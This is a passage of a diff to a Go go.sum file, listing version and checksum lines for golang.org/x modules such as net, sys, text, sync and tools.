golang.org/x/exp v0.0.0-20200207192155-f17229e696bd/go.mod h1:J/WKrq2StrnmMY6+EHIKF9dgMWnmCNThgcyBT1FY9mM=
|
||||
golang.org/x/exp v0.0.0-20200224162631-6cc2880d07d6/go.mod h1:3jZMyOhIsHpP37uCMkUooju7aAi5cS1Q23tOzKc+0MU=
|
||||
golang.org/x/image v0.0.0-20190227222117-0694c2d4d067/go.mod h1:kZ7UVZpmo3dzQBMxlp+ypCbDeSB+sBbTgSJuh5dn5js=
|
||||
golang.org/x/image v0.0.0-20190802002840-cff245a6509b/go.mod h1:FeLwcggjj3mMvU+oOTbSwawSJRM1uh48EjtB4UJZlP0=
|
||||
golang.org/x/lint v0.0.0-20181026193005-c67002cb31c3/go.mod h1:UVdnD1Gm6xHRNCYTkRU2/jEulfH38KcIWyp/GAMgvoE=
|
||||
golang.org/x/lint v0.0.0-20190227174305-5b3e6a55c961/go.mod h1:wehouNa3lNwaWXcvxsM5YxQ5yQlVC4a0KAMCusXpPoU=
|
||||
golang.org/x/lint v0.0.0-20190301231843-5614ed5bae6f/go.mod h1:UVdnD1Gm6xHRNCYTkRU2/jEulfH38KcIWyp/GAMgvoE=
|
||||
golang.org/x/lint v0.0.0-20190313153728-d0100b6bd8b3/go.mod h1:6SW0HCj/g11FgYtHlgUYUwCkIfeOF89ocIRzGO/8vkc=
|
||||
golang.org/x/lint v0.0.0-20190409202823-959b441ac422/go.mod h1:6SW0HCj/g11FgYtHlgUYUwCkIfeOF89ocIRzGO/8vkc=
|
||||
golang.org/x/lint v0.0.0-20190909230951-414d861bb4ac/go.mod h1:6SW0HCj/g11FgYtHlgUYUwCkIfeOF89ocIRzGO/8vkc=
|
||||
golang.org/x/lint v0.0.0-20190930215403-16217165b5de/go.mod h1:6SW0HCj/g11FgYtHlgUYUwCkIfeOF89ocIRzGO/8vkc=
|
||||
golang.org/x/lint v0.0.0-20191125180803-fdd1cda4f05f/go.mod h1:5qLYkcX4OjUUV8bRuDixDT3tpyyb+LUpUlRWLxfhWrs=
|
||||
golang.org/x/lint v0.0.0-20200130185559-910be7a94367/go.mod h1:3xt1FjdF8hUf6vQPIChWIBhFzV8gjjsPE/fR3IyQdNY=
|
||||
golang.org/x/lint v0.0.0-20200302205851-738671d3881b/go.mod h1:3xt1FjdF8hUf6vQPIChWIBhFzV8gjjsPE/fR3IyQdNY=
|
||||
golang.org/x/lint v0.0.0-20201208152925-83fdc39ff7b5/go.mod h1:3xt1FjdF8hUf6vQPIChWIBhFzV8gjjsPE/fR3IyQdNY=
|
||||
golang.org/x/mobile v0.0.0-20190312151609-d3739f865fa6/go.mod h1:z+o9i4GpDbdi3rU15maQ/Ox0txvL9dWGYEHz965HBQE=
|
||||
golang.org/x/mobile v0.0.0-20190719004257-d2bd2a29d028/go.mod h1:E/iHnbuqvinMTCcRqshq8CkpyQDoeVncDDYHnLhea+o=
|
||||
golang.org/x/mod v0.0.0-20190513183733-4bf6d317e70e/go.mod h1:mXi4GBBbnImb6dmsKGUJ2LatrhH/nqhxcFungHvyanc=
|
||||
golang.org/x/mod v0.1.0/go.mod h1:0QHyrYULN0/3qlju5TqG8bIK38QM8yzMo5ekMj3DlcY=
|
||||
golang.org/x/mod v0.1.1-0.20191105210325-c90efee705ee/go.mod h1:QqPTAvyqsEbceGzBzNggFXnrqF1CaUcvgkdR5Ot7KZg=
|
||||
golang.org/x/mod v0.1.1-0.20191107180719-034126e5016b/go.mod h1:QqPTAvyqsEbceGzBzNggFXnrqF1CaUcvgkdR5Ot7KZg=
|
||||
golang.org/x/mod v0.2.0/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA=
|
||||
golang.org/x/mod v0.3.0/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA=
|
||||
golang.org/x/mod v0.4.0/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA=
|
||||
golang.org/x/mod v0.4.1/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA=
|
||||
golang.org/x/mod v0.4.2/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA=
|
||||
golang.org/x/mod v0.6.0-dev.0.20220419223038-86c51ed26bb4 h1:6zppjxzCulZykYSLyVDYbneBfbaBIQPYMevg0bEwv2s=
|
||||
golang.org/x/mod v0.6.0-dev.0.20220419223038-86c51ed26bb4/go.mod h1:jJ57K6gSWd91VN4djpZkiMVwK6gcyfeH4XE8wZrZaV4=
|
||||
golang.org/x/net v0.0.0-20180611182652-db08ff08e862/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4=
|
||||
golang.org/x/net v0.0.0-20180724234803-3673e40ba225/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4=
|
||||
golang.org/x/net v0.0.0-20180826012351-8a410e7b638d/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4=
|
||||
@@ -314,24 +447,59 @@ golang.org/x/net v0.0.0-20190125091013-d26f9f9a57f3/go.mod h1:mL1N/T3taQHkDXs73r
|
||||
golang.org/x/net v0.0.0-20190213061140-3a22650c66bd/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4=
|
||||
golang.org/x/net v0.0.0-20190311183353-d8887717615a/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg=
|
||||
golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg=
|
||||
golang.org/x/net v0.0.0-20190501004415-9ce7a6920f09/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg=
|
||||
golang.org/x/net v0.0.0-20190503192946-f4e77d36d62c/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg=
|
||||
golang.org/x/net v0.0.0-20190522155817-f3200d17e092/go.mod h1:HSz+uSET+XFnRR8LxR5pz3Of3rY3CfYBVs4xY44aLks=
|
||||
golang.org/x/net v0.0.0-20190603091049-60506f45cf65/go.mod h1:HSz+uSET+XFnRR8LxR5pz3Of3rY3CfYBVs4xY44aLks=
|
||||
golang.org/x/net v0.0.0-20190613194153-d28f0bde5980/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
|
||||
golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
|
||||
golang.org/x/net v0.0.0-20190923162816-aa69164e4478/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
|
||||
golang.org/x/net v0.0.0-20190930134127-c5a3c61f89f3 h1:6KET3Sqa7fkVfD63QnAM81ZeYg5n4HwApOJkufONnHA=
|
||||
golang.org/x/net v0.0.0-20190628185345-da137c7871d7/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
|
||||
golang.org/x/net v0.0.0-20190724013045-ca1201d0de80/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
|
||||
golang.org/x/net v0.0.0-20190930134127-c5a3c61f89f3/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
|
||||
golang.org/x/net v0.0.0-20200707034311-ab3426394381 h1:VXak5I6aEWmAXeQjA+QSZzlgNrpq9mjcfDemuexIKsU=
|
||||
golang.org/x/net v0.0.0-20191209160850-c0dbc17a3553/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
|
||||
golang.org/x/net v0.0.0-20200114155413-6afb5195e5aa/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
|
||||
golang.org/x/net v0.0.0-20200202094626-16171245cfb2/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
|
||||
golang.org/x/net v0.0.0-20200222125558-5a598a2470a0/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
|
||||
golang.org/x/net v0.0.0-20200226121028-0de0cce0169b/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
|
||||
golang.org/x/net v0.0.0-20200301022130-244492dfa37a/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
|
||||
golang.org/x/net v0.0.0-20200324143707-d3edc9973b7e/go.mod h1:qpuaurCH72eLCgpAm/N6yyVIVM9cpaDIP3A8BGJEC5A=
|
||||
golang.org/x/net v0.0.0-20200501053045-e0ff5e5a1de5/go.mod h1:qpuaurCH72eLCgpAm/N6yyVIVM9cpaDIP3A8BGJEC5A=
|
||||
golang.org/x/net v0.0.0-20200506145744-7e3656a0809f/go.mod h1:qpuaurCH72eLCgpAm/N6yyVIVM9cpaDIP3A8BGJEC5A=
|
||||
golang.org/x/net v0.0.0-20200513185701-a91f0712d120/go.mod h1:qpuaurCH72eLCgpAm/N6yyVIVM9cpaDIP3A8BGJEC5A=
|
||||
golang.org/x/net v0.0.0-20200520182314-0ba52f642ac2/go.mod h1:qpuaurCH72eLCgpAm/N6yyVIVM9cpaDIP3A8BGJEC5A=
|
||||
golang.org/x/net v0.0.0-20200625001655-4c5254603344/go.mod h1:/O7V0waA8r7cgGh81Ro3o1hOxt32SMVPicZroKQ2sZA=
|
||||
golang.org/x/net v0.0.0-20200707034311-ab3426394381/go.mod h1:/O7V0waA8r7cgGh81Ro3o1hOxt32SMVPicZroKQ2sZA=
|
||||
golang.org/x/net v0.0.0-20200822124328-c89045814202/go.mod h1:/O7V0waA8r7cgGh81Ro3o1hOxt32SMVPicZroKQ2sZA=
|
||||
golang.org/x/net v0.0.0-20201021035429-f5854403a974/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU=
|
||||
golang.org/x/net v0.0.0-20201031054903-ff519b6c9102/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU=
|
||||
golang.org/x/net v0.0.0-20201209123823-ac852fbbde11/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg=
|
||||
golang.org/x/net v0.0.0-20201224014010-6772e930b67b/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg=
|
||||
golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg=
|
||||
golang.org/x/net v0.0.0-20210405180319-a5a99cb37ef4/go.mod h1:p54w0d4576C0XHj96bSt6lcn1PtDYWL6XObtHCRCNQM=
|
||||
golang.org/x/net v0.0.0-20210726213435-c6fcb2dbf985/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y=
|
||||
golang.org/x/net v0.0.0-20220630215102-69896b714898/go.mod h1:XRhObCWvk6IyKnWLug+ECip1KBveYUHfp+8e9klMJ9c=
|
||||
golang.org/x/net v0.0.0-20220728211354-c7608f3a8462 h1:UreQrH7DbFXSi9ZFox6FNT3WBooWmdANpU+IfkT1T4I=
|
||||
golang.org/x/net v0.0.0-20220728211354-c7608f3a8462/go.mod h1:YDH+HFinaLZZlnHAfSS6ZXJJ9M9t4Dl22yv3iI2vPwk=
|
||||
golang.org/x/oauth2 v0.0.0-20180821212333-d2e6202438be/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U=
|
||||
golang.org/x/oauth2 v0.0.0-20190226205417-e64efc72b421/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw=
|
||||
golang.org/x/oauth2 v0.0.0-20190604053449-0f29369cfe45/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw=
|
||||
golang.org/x/oauth2 v0.0.0-20191202225959-858c2ad4c8b6/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw=
|
||||
golang.org/x/oauth2 v0.0.0-20200107190931-bf48bf16ab8d/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw=
|
||||
golang.org/x/oauth2 v0.0.0-20200902213428-5d25da1a8d43/go.mod h1:KelEdhl1UZF7XfJ4dDtk6s++YSgaE7mD/BuKKDLBl4A=
|
||||
golang.org/x/oauth2 v0.0.0-20201109201403-9fd604954f58/go.mod h1:KelEdhl1UZF7XfJ4dDtk6s++YSgaE7mD/BuKKDLBl4A=
|
||||
golang.org/x/oauth2 v0.0.0-20201208152858-08078c50e5b5/go.mod h1:KelEdhl1UZF7XfJ4dDtk6s++YSgaE7mD/BuKKDLBl4A=
|
||||
golang.org/x/oauth2 v0.0.0-20210218202405-ba52d332ba99/go.mod h1:KelEdhl1UZF7XfJ4dDtk6s++YSgaE7mD/BuKKDLBl4A=
|
||||
golang.org/x/sync v0.0.0-20180314180146-1d60e4601c6f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
|
||||
golang.org/x/sync v0.0.0-20181108010431-42b317875d0f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
|
||||
golang.org/x/sync v0.0.0-20181221193216-37e7f081c4d4/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
|
||||
golang.org/x/sync v0.0.0-20190227155943-e225da77a7e6/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
|
||||
golang.org/x/sync v0.0.0-20190423024810-112230192c58 h1:8gQV6CLnAEikrhgkHFbMAEhagSSnXWGV915qUMm9mrU=
|
||||
golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
|
||||
golang.org/x/sync v0.0.0-20190911185100-cd5d95a43a6e/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
|
||||
golang.org/x/sync v0.0.0-20200317015054-43a5402ce75a/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
|
||||
golang.org/x/sync v0.0.0-20200625203802-6e8e738ad208/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
|
||||
golang.org/x/sync v0.0.0-20201020160332-67f06af15bc9/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
|
||||
golang.org/x/sync v0.0.0-20201207232520-09787c993a3a/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
|
||||
golang.org/x/sync v0.0.0-20210220032951-036812b2e83c/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
|
||||
golang.org/x/sync v0.0.0-20220722155255-886fb9371eb4 h1:uVc8UZUe6tr40fFVnUP5Oj+veunVezqYl9z7DYw9xzw=
|
||||
golang.org/x/sys v0.0.0-20180622082034-63fc586f45fe/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
|
||||
golang.org/x/sys v0.0.0-20180830151530-49385e6e1522/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
|
||||
golang.org/x/sys v0.0.0-20180905080454-ebe1bf3edb33/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
|
||||
@ -341,59 +509,225 @@ golang.org/x/sys v0.0.0-20181116152217-5ac8a444bdc5/go.mod h1:STP8DvDyc/dI5b8T5h
|
||||
golang.org/x/sys v0.0.0-20181122145206-62eef0e2fa9b/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
|
||||
golang.org/x/sys v0.0.0-20190209173611-3b5209105503/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
|
||||
golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
|
||||
golang.org/x/sys v0.0.0-20190222072716-a9d3bda3a223/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
|
||||
golang.org/x/sys v0.0.0-20190312061237-fead79001313/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20190403152447-81d4e9dc473e/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20190422165155-953cdadca894/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20190502145724-3ef323f4f1fd/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20190507160741-ecd444e8653b/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20190606165138-5da285871e9c/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20190624142023-c5567b49c5d0/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20190726091711-fc99dfbffb4e/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20190801041406-cbf593c0f2f3/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20190922100055-0a153f010e69/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20190924154521-2837fb4f24fe h1:6fAMxZRR6sl1Uq8U61gxU+kPTs2tR8uOySCbBP7BN/M=
|
||||
golang.org/x/sys v0.0.0-20190924154521-2837fb4f24fe/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20200323222414-85ca7c5b95cd h1:xhmwyvizuTgC2qz7ZlMluP20uW+C3Rm0FD/WLDX8884=
|
||||
golang.org/x/sys v0.0.0-20191001151750-bb3f8db39f24/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20191204072324-ce4227a45e2e/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20191228213918-04cbcbbfeed8/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20200113162924-86b910548bc1/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20200116001909-b77594299b42/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20200122134326-e047566fdf82/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20200202164722-d101bd2416d5/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20200212091648-12a6c2dcc1e4/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20200223170610-d5e6a3e2c0ae/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20200302150141-5c8b2ff67527/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20200323222414-85ca7c5b95cd/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/text v0.3.0 h1:g61tztE5qeGQ89tm6NTjjM9VPIm088od1l6aSorWRWg=
|
||||
golang.org/x/sys v0.0.0-20200331124033-c3d80250170d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20200501052902-10377860bb8e/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20200511232937-7e40ca221e25/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20200515095857-1151b9dac4a9/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20200523222454-059865788121/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20200803210538-64077c9b5642/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20200905004654-be1d3432aa8f/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20200930185726-fdedc70b468f/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20201201145000-ef89a241ccb3/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20210104204734-6f8348627aad/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20210119212857-b64e53b001e4/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20210225134936-a50acf3fe073/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20210330210617-4fbd30eecc44/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20210423185535-09eb48e85fd7/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
|
||||
golang.org/x/sys v0.0.0-20210510120138-977fb7262007/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
|
||||
golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
|
||||
golang.org/x/sys v0.0.0-20210630005230-0f9fa26af87c/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
|
||||
golang.org/x/sys v0.0.0-20210927094055-39ccf1dd6fa6/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
|
||||
golang.org/x/sys v0.0.0-20220520151302-bc2c85ada10a/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
|
||||
golang.org/x/sys v0.0.0-20220704084225-05e143d24a9e/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
|
||||
golang.org/x/sys v0.0.0-20220731174439-a90be440212d h1:Sv5ogFZatcgIMMtBSTTAgMYsicp25MXBubjXNDKwm80=
|
||||
golang.org/x/sys v0.0.0-20220731174439-a90be440212d/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
|
||||
golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo=
|
||||
golang.org/x/term v0.0.0-20210927222741-03fcf44c2211/go.mod h1:jbD1KX2456YbFQfuXm/mYQcufACuNUgVhRMnK/tPxf8=
|
||||
golang.org/x/text v0.0.0-20170915032832-14c0d48ead0c/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
|
||||
golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
|
||||
golang.org/x/text v0.3.1-0.20180807135948-17ff2d5776d2/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
|
||||
golang.org/x/text v0.3.2 h1:tW2bmiBqwgJj/UpqtC8EpXEZVYOwU0yG4iWbprSVAcs=
|
||||
golang.org/x/text v0.3.2/go.mod h1:bEr9sfX3Q8Zfm5fL9x+3itogRgK3+ptLWKqgva+5dAk=
|
||||
golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ=
|
||||
golang.org/x/text v0.3.4/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ=
|
||||
golang.org/x/text v0.3.6/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ=
|
||||
golang.org/x/text v0.3.7 h1:olpwvP2KacW1ZWvsR7uQhoyTYvKAupfQrRGBFM352Gk=
|
||||
golang.org/x/text v0.3.7/go.mod h1:u+2+/6zg+i71rQMx5EYifcz6MCKuco9NR6JIITiCfzQ=
|
||||
golang.org/x/time v0.0.0-20181108054448-85acf8d2951c/go.mod h1:tRJNPiyCQ0inRvYxbN9jk5I+vvW/OXSQhTDSoE431IQ=
|
||||
golang.org/x/time v0.0.0-20190308202827-9d24e82272b4/go.mod h1:tRJNPiyCQ0inRvYxbN9jk5I+vvW/OXSQhTDSoE431IQ=
|
||||
golang.org/x/time v0.0.0-20190921001708-c4c64cad1fd0/go.mod h1:tRJNPiyCQ0inRvYxbN9jk5I+vvW/OXSQhTDSoE431IQ=
|
||||
golang.org/x/tools v0.0.0-20180221164845-07fd8470d635/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
|
||||
golang.org/x/time v0.0.0-20191024005414-555d28b269f0/go.mod h1:tRJNPiyCQ0inRvYxbN9jk5I+vvW/OXSQhTDSoE431IQ=
|
||||
golang.org/x/tools v0.0.0-20180828015842-6cd1fcedba52/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
|
||||
golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
|
||||
golang.org/x/tools v0.0.0-20190114222345-bf090417da8b/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
|
||||
golang.org/x/tools v0.0.0-20190226205152-f727befe758c/go.mod h1:9Yl7xja0Znq3iFh3HoIrodX9oNMXvdceNzlUR8zjMvY=
|
||||
golang.org/x/tools v0.0.0-20190311212946-11955173bddd/go.mod h1:LCzVGOaR6xXOjkQ3onu1FJEFr0SW1gC7cKk1uF8kGRs=
|
||||
golang.org/x/tools v0.0.0-20190312151545-0bb0c0a6e846/go.mod h1:LCzVGOaR6xXOjkQ3onu1FJEFr0SW1gC7cKk1uF8kGRs=
|
||||
golang.org/x/tools v0.0.0-20190312170243-e65039ee4138/go.mod h1:LCzVGOaR6xXOjkQ3onu1FJEFr0SW1gC7cKk1uF8kGRs=
|
||||
golang.org/x/tools v0.0.0-20190328211700-ab21143f2384/go.mod h1:LCzVGOaR6xXOjkQ3onu1FJEFr0SW1gC7cKk1uF8kGRs=
|
||||
golang.org/x/tools v0.0.0-20190425150028-36563e24a262/go.mod h1:RgjU9mgBXZiqYHBnxXauZ1Gv1EHHAz9KjViQ78xBX0Q=
|
||||
golang.org/x/tools v0.0.0-20190506145303-2d16b83fe98c/go.mod h1:RgjU9mgBXZiqYHBnxXauZ1Gv1EHHAz9KjViQ78xBX0Q=
|
||||
